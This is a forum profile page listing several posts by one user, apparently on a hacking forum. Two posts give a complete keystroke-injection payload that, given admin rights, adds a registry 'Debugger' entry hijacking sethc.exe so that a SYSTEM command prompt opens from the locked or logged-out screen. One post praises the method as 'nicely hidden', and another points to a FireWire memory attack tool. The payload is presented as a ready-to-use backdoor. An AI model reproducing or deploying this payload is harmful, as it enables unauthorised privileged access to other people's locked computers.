Jump to content

crackruckles

Active Members
  • Posts

    7
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by crackruckles

  1. The only thing i could think of is a firewire attack something like project inception www.breaknenter.org/projects/inception/ you could put this on a pi with a usb to firewire adapter cable and attack that way, ive been using that for a while now but i can tell you it is not easy getting the pi version of linux to like the old firewire module as the code for firewire got updated a while back for linux and renders this attack impossible at the moment.
  2. you can just delete it and it will be back to normal. yeah you can use any of them but i prefer sethc as its nice and hidden and it has quite a long time out period.
  3. DISCLAIMER First off i have posted this on github but i thought ide add it here as well as this is version 2. This command prompt will close automatically due to the way this hack works (after about 3 minutes or so) This hack does require pre work and does require administrator privileges to modify the registry and i am assuming that UAC is turned on. Pre workDELAY 400 ESCAPE DELAY 200 CONTROL ESCAPE DELAY 750 STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f" DELAY 750 CTRL-SHIFT ENTER DELAY 1000 ALT y Left Alt + Left Shift + Print Screen to access the system prompt from anywhere on the machine including when the machine is logged out or locked. Have fun guys.
  4. if you have done my system privileges cmd attack while the machine was unlocked then when it was locked you would have access to a command prompt with system access and im sure you could do something from there. DELAY 400 ESCAPE DELAY 200 CONTROL ESCAPE DELAY 750 STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f" DELAY 750 CTRL-SHIFT ENTER DELAY 1000 ALT y Left Alt + Left Shift + Print Screen to access the prompt.
  5. Press the Win keyboard key or click on Vista Start button. Type cmd into the Start Search textbox. Press Ctrl+Shift+Enter keyboard shortcut. Ctrl-Shift-Enter is the general keyboard shortcut that triggers elevation to “Run as Administrator”. Press Alt+C or press Continue to confirm the UAC elevation warning prompt. http://www.mydigitallife.info/how-to-open-elevated-command-prompt-with-administrator-privileges-in-windows-vista/
×
×
  • Create New...